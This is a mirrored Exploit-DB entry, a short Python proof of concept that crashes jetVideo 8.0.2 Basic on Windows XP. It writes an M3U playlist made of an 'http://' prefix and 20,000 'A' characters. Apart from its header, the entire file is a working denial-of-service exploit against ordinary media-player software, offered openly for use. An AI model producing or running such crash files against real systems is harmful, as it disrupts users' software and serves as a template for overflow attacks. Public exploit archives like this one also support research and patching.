exploit-db-mirror/exploits/windows/dos/18481.py
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

18 lines
367 B
Python
Executable file

# Exploit Title: [jetVideo Crash Exploit]
# Author: [Senator of Pirates]
# Email : [Senator.of.Pirates.team@gmail.com]
# Software Link: [http://www.jetaudio.com/download/jetvideo.html]
# Version: [8.0.2 Basic]
# Tested on: [Windows XP PS3 En]
header = "http://"
junk = "A" * 20000
payload = (header+junk)
f = open("Exploit.m3u","wb")
f.write(payload)
f.close()